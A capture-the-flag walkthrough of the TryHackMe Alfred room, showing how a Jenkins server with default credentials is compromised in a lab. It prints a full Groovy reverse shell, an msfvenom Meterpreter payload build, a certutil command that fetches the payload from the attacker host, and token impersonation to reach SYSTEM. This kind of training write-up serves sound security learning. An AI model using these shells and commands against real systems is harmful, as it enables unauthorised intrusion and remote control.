This walkthrough will go over the Alfred room found on TryHackMe. The objective behind this room is to exploit a misconfigured Jenkins server, obtain a reverse shell, and escalate privileges by leveraging a SeImpersonatePrivilege
capability on a low-level user to obtain NT AUTHORITY\SYSTEM
level privileges.
Step 1: Nmap
nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 17:33 MDT
Nmap scan report for alfred.thm (10.10.70.88)
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows Server 2008 R2 SP1 (87%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.82 seconds
From this scan, we identified three open ports: 80, 3389, and 8080.
Port 80:
Port 8080:
Step 2: Logging In
Trying some default login credentials, we discover that admin:admin
works.
Step 3: Initial Foothold
Peeking around the system, we find an area where we can use groovy
scripts. This will be our way into the box.
We're using a groovy shell which can be found on PayloadsAllTheThings.
String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Running this script inside the built-in Script Console
calls our attack box and drops us into a shell.
From here we find our user.txt
flag located in C:\Users\bruce\Desktop\
.
Step 4: Upgrade to Meterpreter Shell
First, we want to generate our payload using msfvenom
:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.28.215 LPORT=1335 --format exe -o payload.exe
From the victim, we're going to use certutil
to download it.
certutil.exe -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
Now we fire up msfconsole
and set up our handler to catch the shell.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1335
exploit
Once the payload.exe
is run on the victim machine, our handler will catch the shell and drop us in.
Step 5: Privesc
Let's see what privileges we have currently by typing whoami /priv
.
Nice. We have SeImpersonatePrivilege
, let's exploit this vulnerability. We can achieve this by using the incognito module
built into metasploit.
Next, we want to impersonate the Administrator's token. We can do this by typing the following command: impersonate_token "BUILTIN\Administrators"
.
Now let's migrate to a process with correct permissions. The safest bet is to always migrate to the services.exe
service.
View processes:
ps
Find the PID of
services.exe
migrate <PID>
Now that we're successfully NT AUTHORITY\SYSTEM
, let's find our root flag and complete this room.
This room was a great introduction to AD pentesting. After going through this, I realized I have a long way ahead of me until I feel comfortable enough to sit down for the PNPT certification by TCM Security. I hope you enjoyed this walkthrough of the Alfred room found on TryHackMe, and as always, Happy Hacking.